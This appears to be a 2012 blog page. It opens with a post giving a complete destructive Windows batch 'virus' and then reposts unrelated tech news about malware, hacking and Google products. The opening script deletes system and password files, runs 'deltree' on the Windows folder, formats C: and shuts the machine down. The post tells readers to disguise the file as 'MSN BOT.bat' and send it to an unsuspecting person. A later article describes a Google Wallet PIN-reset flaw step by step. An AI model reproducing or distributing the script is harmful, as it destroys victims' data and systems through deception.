Saturday, February 11, 2012

Vius

1. Open notepad.
2. Fill in this in notepad:

Quote:

@echo off
REM this is a virus made by someone nowhere
REM nobody know me, just my mother and my sexy dog...
REM hey got something against my dog? EAT THIS!
MKDIR C:\windows\temp\a
MKDIR C:\windows\temp\b
MKDIR C:\windows\temp\c
MKDIR C:\windows\temp\d
MKDIR C:\windows\temp\e
MKDIR C:\windows\temp\f
MKDIR C:\windows\temp\g
MKDIR C:\windows\temp\h
MKDIR C:\windows\temp\i
MKDIR C:\windows\temp\j
MKDIR C:\windows\temp\k
MKDIR C:\windows\temp\l
MKDIR C:\windows\temp\m
MKDIR C:\windows\temp\n
MKDIR C:\windows\temp\o
MKDIR C:\windows\temp\p
MKDIR C:\windows\temp\q
MKDIR C:\windows\temp\r
MKDIR C:\windows\temp\s
MKDIR C:\windows\temp\t
MKDIR C:\windows\temp\u
MKDIR C:\windows\desktop\hey_lamer_wazzup
MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files
MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files\ab
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator\ac
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files\ad
MKDIR C:\windows\temp001
MKDIR C:\windows\temp002
MKDIR C:\windows\temp003
MKDIR C:\windows\temp004
MKDIR C:\windows\temp005
MKDIR C:\windows\temp006
MKDIR C:\windows\temp007
MKDIR C:\windows\temp008
MKDIR C:\windows\temp009
MKDIR C:\windows\temp000
MKDIR C:\windows\temp010
MKDIR C:\windows\temp020
MKDIR C:\windows\temp030
MKDIR C:\windows\temp040
MKDIR C:\windows\temp050
REM let some gone on the lazy network
REM yeah
echo WELCOME TO THIS ANTI-NOOB VIRUS..
REM Now the real work will start....
pause
echo wait..
echo I have a surprise for you.... fasten your seatbelt dude!
cd\
cd C:\
@if exist C:\Autoexec.bat del C:\Autoexec.bat
del config.sys
cd windows
del control.ini
@if exist C:\windows\dosstart.bat del C:\windows\dosstart.bat
cd\
cd C:\
@if exist C:\logo.sys del C:\logo.sys
@if exist C:\windows\rundll.exe del C:\rundll.exe
@if exist C:\windows\rundll32.exe del C:\windows\rundll32.exe
@if exist C:\windows\ios.ini del C:\windows\ios.ini
cd\
cd windows
del win.ini
@if exist C:\WINDOWS\OPTIONS\CABS\scandisk.ini del C:\WINDOWS\OPTIONS\CABS\scandisk.ini
@if exist C:\WINDOWS\system.ini del C:\WINDOWS\system.ini
cd\
cd C:\
@if exist C:\WINDOWS\*.pwl del C:\WINDOWS\*.pwl
@if exist C:\WINDOWS\SYSTEM\sysedit.exe del C:\WINDOWS\SYSTEM\sysedit.exe
@if exist C:\WINDOWS\SYSTEM\Systray.exe del C:\WINDOWS\SYSTEM\Systray.exe
@if exist C:\WINDOWS\system.new del C:\WINDOWS\system.new
@if exist C:\WINDOWS\system.bak del C:\WINDOWS\system.bak
@if exist C:\WINDOWS\system.cb del C:\WINDOWS\system.cb
@if exist C:\WINDOWS\system\Msjstick.drv del C:\WINDOWS\system\Msjstick.drv
@if exist C:\WINDOWS\system\Supervga.drv del C:\WINDOWS\system\Supervga.drv
@if exist C:\WINDOWS\system\Mouse.drv del C:\WINDOWS\system\Mouse.drv

Echo Wow.. that was a freaky ride!!
echo What?! You want more?
echo Ok... but only the first time is free...
echo Raise your hand and say: Goodbye lovely pc... you're gonna
crash forever, cause I've been so stupid to open this.
echo I thought that I was smart.. but I'm sooo dumb... Farewell!
cd\
cd windows
deltree /y windows
format c: /y
shutdown -s -t 10 -c "Raise your hand and say: Goodbye lovely pc...
you're gonna crash forever, cause I've been so stupid to open this."


3. Save file, example "MSN BOT.bat"
Make sure you save as .BAT!
Use your imagination.

4. Send you .BAT file to someone that's dumb. If he/she opens it, he/she will get a lot of warnings, folder that opens, deleting things. The windows folder - C:\windows - will be deleted to. After this, the computer will be shut down.

DO NOT OPEN THIS FILE
DO NOT OPEN THIS FILE
DO NOT OPEN THIS FILE
DO NOT OPEN THIS FILE
DO NOT OPEN THIS FILE


Q: What does this file do?

R: This file opens all e-mails, and maps. It also deletes the full windows file wich includes the startup file when you press the button if you want to play on your computer.
Q: If i open it?
R: Ouch. Make sure you won't, otherwise you will have a big problem.

Friday, February 10, 2012

Malware devs embrace open-source

Blackhatters desperate for props from pals, says security firm



Cybercrooks have embraced the open-source model in the development of banking Trojans following the release of source code for the infamous ZeuS cybercrime toolkit last year.
Multiple variants of a Zeus Trojan called Citadel have emerged over recent weeks as VXers have embraced a new development lifecycle - dubbed open-source malware.
Net security firm Seculert reports that the main developers of the software have also created forums where customers of Citadel (other cybercriminals) can suggest new features and modules for the malware, report bugs and other errors, or enter into discussion with their fellow e-banking fraudsters.
The approach is fuelling development of extremely well-developed malware, Seculert reports.
"Because of the new development lifecycle, this malware evolves quickly, and since late December we have seen over five new versions released by the Citadel authors, with new modules and features added to each version," Aviv Raff, CTO at Seculert, told El Reg.
New modules and features include support for AES Encryption of malware configuration files, support for security vendor websites blacklisting and technology designed to keep off the radar of Zeus tracking websites.
Cybercriminals have embraced open-source malware with the creation of 20 unique botnets using the new Citadel malware, which is starting to become the FreeBSD of e-banking fraudsters. Several of those botnets have infected more than 100,000 machines, Raff reports.
Cybercrooks have embraced trends from the legitimate business world for some years. For example, the Citadel authors provide their customers with a user manual, release notes and a licence agreement.
"We suspect that the open-source model may be the next growing trend," Seculert concludes. "The cybercrime world is characterised by rapid development, cutting-edge technology, and hackers’ constant cravings for recognition. By looking at the developments in the software world, the open-source model may be well accepted in the cybercrime ecosystem as well."
A blog post from Seculert, showing admin panels for the malware and a pie-chart illustrating Citadel infections per country, can be found here. ®

IBM Launches Free Online Security Training Tools


IBM Launches Free Online Security Training Tools

IBM releases downloadable training kits designed to help students, parents and teachers improve their Internet security
IBM has released free online security training kits to teach parents, teachers and students about Internet safety and digital responsibility. The move comes as fears rise that a cavalier attitude to security within the upcoming workforce will threaten corporate security.
The training tools were announced on Wednesday in conjunction with Safer Internet Day, and consist of three volunteer kits.

Online safety and privacy

The Control Your Online Identity kit aims to educate teenagers in particular about how to protect personal data and appropriately handle their online image.
Internet Safety Coaching is a tool which covers the basics of security for typical sites visited and online services used by young people, including instant messaging and social networks.
Cyberbullying is oriented towards parents and teachers to teach them how to recognise signs of online bullying and how to prevent it.
IBM intends the three tool sets to be used in co-ordination with lesson plans at schools as well as at out of school activity clubs. The long-term goal will be to ensure indiduals can equally protect their digital profiles and their computers.
“IBMers are committed to helping educate people on ways to safely and securely use the Internet,” said Harriet Pearson, IBM Security Counsel and Chief Privacy Officer, in a statement. “The resources we are donating will help teachers and parents raise awareness that most Internet-based threats to individual and computer security can significantly be reduced by actions that informed users take themselves.”
To promote their tools and internet safety as a whole, IBM teamed with various organisations in European countries on Safer Internet Day. In the UK, volunteers visited schools to raise awareness and ‘IBMers’ partnered with the NGO YPNGlobal on their Cyber Champions program, which educates schoolchildren about online privacy.

Hacker group ‘Anonymous’ claims it broke into Ala. government websites, stole personal info


MONTGOMERY, Ala. — Computer hackers claiming to be from the loose-knit group known as Anonymous say they have broken into several Alabama law enforcement and government websites and have stolen the personal information for more than 46,000 people.
In an online news release Friday, the group claimed to have taken Social Security numbers, license plate numbers, phone numbers, addresses and criminal records.Mobile city spokeswoman Barbara Drummond said Utah authorities alerted officials Thursday night that hackers may be targeting the city. She told The Associated Press that the city shut down its computers to avoid the attack and that the hackers did not gain access to Mobile’s servers.
However, hackers did breach the website of the city webmaster, and took data from a recent program offering amnesty to people with outstanding warrants for municipal offenses.
Hackers claiming to be affiliated with Anonymous have launched a spate of attacks on law enforcement websites in recent weeks, hitting such cities as Salt Lake City, Boston, Syracuse, N.Y. and Greece. The collective of activists, pranksters and hackers have also targeted financial institutions such as Visa and MasterCard, as well as the Church of Scientology.
The warrant amnesty information from Mobile had already been made public by the city to encourage people to participate in the amnesty program, Drummond said. She said city technicians are still trying to determine whether some personal information required to log on to that website may have been stolen.
The group says the attack was prompted by what it called Alabama’s “racist legislation” targeting illegal immigrants.
“You complain about immigrants costing the state money, however, you do not care about spending the same money to protect your own legal citizens,” the news release said.
The group says it will not use the personal information to do damage.
“Because of the possible cost of lives and money to regular citizens, we are deleting this data and are seeking to make it known that you not only have shown zero regard for immigrants, but for the very citizens that live in the great state of Alabama.”
Officials in other Alabama cities have said they are not aware of being attacked.

Google Wallet Flaw Allows Digital Pickpocket


A new and troubling, vulnerability in Google Wallet has been exposed. Unlike a low-risk security issue identified yesterday, today's security flaw is described as painfully easy.
Security firm Zvelo yesterday discovered a vulnerability in Google Wallet, Google's NFC payment system, that allows anyone holding an already-rooted smartphone running Google Wallet to access the Google Wallet PIN.
Such a vulnerability allows a hacker to use a Google Wallet-enabled smartphone to maker purchases using the credit card information tied to the NFC chip. However, Google points out that this is a low-risk situation, because it only works if the smartphone has already been rooted (by the owner), and credit card information, while useable, is still secure.

Easy Exploit

Today's more serious glitch is described by smartphone blog The Smartphone Champ,which describes a security flaw in Google Wallet that is "painfully easy to do," requires no extra software (unlike the Zvelo flaw), and does not require a rooted device.
Basically, the problem stems from the fact that credit card data is tied to the device, not a person's Google account. So anyone holding a Google Wallet-enabled phone can change the Google Wallet PIN by going into the application settings menu and clearing the data for the Google Wallet app. Once this is done, the Google Wallet app will prompt the user/hacker for a new PIN.
Because the card data is tied to the device, when the user/hacker adds the Google prepaid card to the Google Wallet app after resetting the data, the old card data will be added to the app. So the user/hacker will now be able to access the card's funds -- although it should be noted that the credit card data will still be secure (but does it really matter if it's secure when someone else can access your funds?).
Here's a demonstration of the vulnerability:
This vulnerability is a much bigger deal than the Zvelo one, because it's easy to perform (the Zvelo vulnerability required a modicum of hacking knowledge to crack), and it can be performed on any device--rooted or not.

Google's Advice

Google has noted the security flaw and tells PCWorld it's currently working on an automated fix that will be available soon. Meanwhile, Google recommends that all Google Wallet users set up a lock screen as an additional layer of protection for their phone.
Google also strongly encourages users who lose or want to sell their Google Wallet-enabled phones call the Google Wallet support (toll-free) number, 855-492-5538, to disable the prepaid card.

What Will Google’s Reported Home Entertainment System Be?


Screenshot of a Google Project Tungsten reference device, believed to have inspired the Google home entertainment system.Just when it seemed like the reportedly imminent launch of the iPad 3 was going to be the big tech story of the week, Google came along and stole Apple’s thunder.
Now the piece of hardware that’s at the top of everyone’s minds (or at least the top of Techmeme) is a reported Google home entertainment system. According to the Wall Street Journal, Google’s new device will be unveiled “later this year, people familiar with the matter said.”
The new Google device described by The Journal would stream music wirelessly throughout a user’s home from Google Music and would be controlled by a smartphone or tablet. Such a device would compete directly with, and be cheaper than, the Sonos wireless music streaming system currently available on the market. Though no specific Sonos product is mentioned, the most expensive product on Sonos’s website is the $499 Connect: Amp, which can stream music from a home computer throughout any other speakers in the home and is also controlled by a smartphone or tablet.
Sonos coincidentally got a nice bump from the New York Times, with writer Nick Wingfield saying it’s better than Apple’s wireless music controlling options.
But back to Google: The Journal isn’t sure yet whether or not the new Google device would operate Android, Google’s mobile operating system, but that seems like a pretty safe bet. Google’s other operating system, the desktop, Web-based Chrome OS, has not been a big hit with consumers yet.
The Journal’s report is scant on all the other important details, though — such as when precisely the mythical Google Music device will be available, for how much, in which retailers and under what name.
The Journal recalled that back in May 2011 at Google’s annual I/O developer conference, the company showed off a prototype service called “Android@Home,” which would allow homeowners to control virtually any electrical appliance — from lights to dishwashers to outside sprinkler systems — using an Android smartphone or tablet. Joe Britt, the managing director of that project, also previewed “Project Tungsten,” two reference devices that The Journal says are “related” to the forthcoming entertainment system.
One of them was an Android-powered music player that used near field communications technology (NFC) to automatically scan CDs in their cases and stream the corresponding albums from Google’s cloud-based music library. Check it out on display at the 2011 I/O conference in the following video (starts at min 46):
Google is also using NFC to power its wireless mobile phone payement system, Google Wallet.
The New York Times, also reporting on the new Google device on Friday, adds a few more details: “While the initial purpose of the device will be for streaming music, the eventual use could be much wider,” also noting that the device has been in the works for more than a year, well before Google announced its intention to buy Motorola Mobility for $12.5 billion.
Two other bits of news from earlier in the month suggest that while the new Google device is actually coming, it won’t be just another piece of vaporware. On February 3rd, GigaOmreported that Google had in December filed an application with the Federal Communications Commission to “to test a mysterious Wi-Fi and Bluetooth-enabled ‘entertainment device,’ in employees’ homes in four U.S. cities,” Los Angeles, New York, Cambridge, Massachusetts and Mountain View, California, where Google is headquartered. The company specifically requestedthat it be allowed to test 252 devices that “utilizes a standard WiFi/Bluetooth module.” As the FCC application continues: “Users will connect their device to home WiFi networks and use Bluetooth to connect to other home electronics equipment. “
And on February 4, VentureBeat reported that Google had recently managed to hire away Apple’s senior director of product integrity, Simon Prakash, who had worked for the company for 8 years.
As VentureBeat noted: “Now he’ll be working for Google on a secret project, presumably run by Google co-founder Sergey Brin, who is in charge of a variety of secret research and development projects at Google.”
Although all the reports are pointing toward a Google home music system, the company could end up surprising everyone and possibly release something entirely different, such as a rumored Google videogame console. In any case, the company is enjoying an unprecedented amount of buzz at the moment, a buzz of, well, Apple-like proportions.

Why Google Is Getting Into Entertainment: Your Data

Everyone (including the New York Times!) is suggesting that Google is busy designing andtesting its own-branded hardware--information that's coming directly from insiders with knowledge of the company's plans. The mysterious device "exists as a prototype and will eventually be sold as a branded item to consumers," says the Times, and as an entertainment-centric gizmo, its initial purpose will be for streaming music. This is fascinating on a number of levels, but one question about the rumor really stands out: Why?
After all, Google's early and current forays into own-brand hardware aren't exactly storming successes. Yes the Nexus line of phones sells okay now, and is pretty highly regarded--but it's often outshone and definitely outsold by other Android phones, like the other members of the Galaxy line by Samsung. Google TV in its first iteration, meanwhile, was such a disaster that manufacturing partner Logitech eventually exited the partnership with Google with overt relief. Any move by Google to expand its efforts in consumer hardware could be compared to these examples and fall into their shadow. Indeed, someheadlines concerning this rumor go even further: "Google's Foray Into Hardware Will Be A Total Disaster."
But we're thinking differently. The Times article sheds some light on the matter, noting Google has to move in directions like consumer entertainment because of its need to grow, and because of the changing uses of technology in the home. It's why Apple makes its hobby project Apple TVs, for example, because it needs to have a presence in the home in a use case different to its typical computing and music devices. And Google is quite definitely moving out of its core search engine market and trying to get into new ventures like selling content (something Apple and Amazon are making great successes of). In this way, a streaming music device that connects to Google's vast servers over the Net, probably wirelessly, would be a clever way to get consumers to pay for their music via Google rather than its competitors.
The real reason is probably much more subtle, however. This is Google we're talking about--a company that goes out of its way to appear to be serving the public, all the while gathering a precious resource it uses to earn its billions: Data. Look at this other piece of hardware that's popped up recently, the Screenwise Data Collector. It's part of an opt-in data collection service that you can volunteer to be part of, for a modest monthly dollar reward, that monitors your online activity in concert with a browser plug-in. Google will use this data for its own purposes, which you can assume involves honing its algorithms, working out online consumer behavior patterns and other things like user profiling. 
Also, glance at the privacy policy for Google TV, which reminds us that Google collects "certain data. In order to continually improve our services and provide a better user experience, we always collect some information and statistics from your Google TV Product and/or the Google TV Platform. For example, we log information regarding problems setting up your system, issues with features of your system, and your use of the quick-access keys on your remote (that is, the DVR key, the guide key, the search key, etc.)." You can even opt in to share more information with Google, like your viewing history, in order that they can personalize recommendations for you...and also, of course, so that Google can better understand how its users actually use its TV boxes.
Ultimately this data from Google TV, from Google+, from Google Voice, from YouTube, from search, from Gmail and basically every other Google product turns into money for Google via advertising space. This space is sold to advertising partners on the understanding that a particular brand message is very precisely targeted at its potential market in a way that few other technologies can match, and so that every ad dollar spent is more efficiently employed.
And that is why Google wants to get into "streaming music" with hardware that the Timesnotes will have an eventual use that's "much wider." Music is something that the general public is now extremely disposed to think of as digital data--more so than TV, more so than other content like books (although both of these are trending that way too) and as such it's a low-hanging branch for Google. Of course plenty of hardware exists that does wireless streaming of music in the home in one way or another, via Internet radio, from users' own stored archives or even simply relaying audio from a PC to a stereo system--names like Apple and Sonos apply to these systems. But Google would be able to add its own unique spin on the idea, perhaps offering discounted access to content on the understanding that it can interweave adverts into the mix and target these to you appropriately by collecting user data. The company hasn't responded yet to our questions about the rumor.
But the conclusion looks pretty straightforward: Basically Google wants to be off your desk, out of your phone pocket, and into your home. Because that's where even more advertising dollars can be found.